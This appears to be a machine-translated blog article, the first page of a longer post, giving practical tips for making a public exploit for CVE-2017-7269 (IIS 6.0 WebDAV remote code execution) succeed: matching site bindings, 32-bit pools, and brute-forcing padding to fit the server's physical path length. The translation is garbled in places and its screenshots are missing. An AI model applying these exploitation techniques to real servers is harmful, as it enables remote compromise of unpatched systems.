CVE-2017-7269 a few tips and BUG fixes-vulnerability warning-the black bar safety net

Seen the analysis, to talk about the use of a few tips.

1. Vulnerability scope

The original poc above wrote only applies to the 03 r2, in fact, the most common of 03 sp2 can also be directly reproduced, so it seems that the attack range is very large, after all, the domestic selling most of the 03 are Enterprise Edition sp2.

Test the English version 03 sp2 the same success, more version no environmental testing.

2. Vulnerability unsuccessful problem

Throwing away all can not use the problem aside, when the conditions are met, may also have a four-point lead to failure, in I degree reverse order.

The first point is the port and the domain binding issue:

In General, the local test directly to the iis’s default site to start with, the default site does not have any binding, it will not appear any problems.

And in fact, and in the http header HOST field the same, If header information in the two url is requested and the site is bound to match, and must domain name and port match exactly, otherwise only receive a 502 in.

! [](/Article/UploadPic/2017-4/20174710552788. png)

For example, test a Only binding the port 8080 of the site you want to http://localhost:8080/, the 测试 绑定 域名 为 zcgonvh.com, port 8888 of the site you want to http://zcgonvh. com:8888/etc.

Of course, the Exp is not affected:

! [](/Article/UploadPic/2017-4/20174710552543. png)

Test of time Be careful: when you have finished modifying the configuration, please restart the iis, or does not exceed the Disable threshold under the premise of the end of the w3wp process. Below those who need to modify the iis configuration to do the test.）

The second point is the 64-bit issues, although not common, but 03 there is really 64-bit.

64-bit pool is actually okay, SEH will handle the exception, does not cause the crash:

! [](/Article/UploadPic/2017-4/20174710552905. png)

And if on a 32-bit application pool, it will cause the crash:

! [](/Article/UploadPic/2017-4/20174710552980. png)

Debugging found that the error appears in the ROP chain, the client connection will be directly disconnected and no data is returned.

Solution: change the ROP.

64-bit 03 after all is not much, experience of time besides.

So the 32-bit environment you can use the following way to build: a

cscript. exe %SYSTEMDRIVE%\inetpub\adminscripts\adsutil. vbs SET W3SVC/AppPools/Enable32bitAppOnWin64 1
iisreset

After closing all the web Service Extension, 添加一个新扩展指向%systemroot%\syswow64\inetsrv\httpext.dll and enabled.

! [](/Article/UploadPic/2017-4/20174710552701. png)

The third point is the physical path of the problem, Yes, that’s the physical path.

According to the analysis in the article CVE-2017-7269 IIS6. 0 remote code execution vulnerability analysis and Exploit for debugging, you can see for covering the buffer:

! [](/Article/UploadPic/2017-4/20174710552202. png)

Obviously, this is If the head in the first Url through the MapPath obtained after the physical path, not the default path for the directory length including the trailing backslash is not 19, then the error is inevitable.

The second Url is the same, if because of this error, will return a 500 error.

! [](/Article/UploadPic/2017-4/20174710552330. png)

The solution is simple: change the length of the can.

Path of less than 19 can simply be added:

! [](/Article/UploadPic/2017-4/20174710552563. png)

While the actual path is often greater than 19, the need for padding to delete. ROP and stackpivot in front of the padding is actually UTF8 encoded characters, each of the three bytes after decoding becomes two bytes of the UTF16 character, to ensure the Exp is not the case of an error, there 0x58 characters is useless. So can the front 0x108 bytes deleted, and replaced with 0x58 an a or b.

The last Poc is roughly like this:

! [](/Article/UploadPic/2017-4/20174710553564. png)

Really want to achieve a stable remote use of the words, but also the need for the physical path length of the blasting.

The red box is 103 a, The physical path is c:\inetpub, the add up to of 114. Remove the drive letter, and left 111 in. So you can put Exp of the padding is increased to 111, and the successive reduction. When the length does not match the return of 500, is successful when the natural return of 200.

! [](/Article/UploadPic/2017-4/20174710553670. png)

In General the physical path length of more than 114 sites almost nothing, sufficient. If by some way disclose the physical path of the words, with 114 minus the physical path length, including the end of the backslash is the required padding length.

The last point, also is the most pit father’s place: the timeout problem.

The simple point is that when the exp is executed successfully after a period of time (probably ten minutes to twenty minutes or so, during which no matter whether the access is windbg the pending time does not count), and then on this site to perform the exp will never be successful, at the same time returns to 400.

If the w3wp hang a debugger, you can see there was an access violation, of course, since SEH does not cause the site to hang out.

! [](/Article/UploadPic/2017-4/20174710553390. png)

At this time the site is in the same pool the other sites would all hang out, http code of 500, the error message parameter incorrect:

[1] [2] next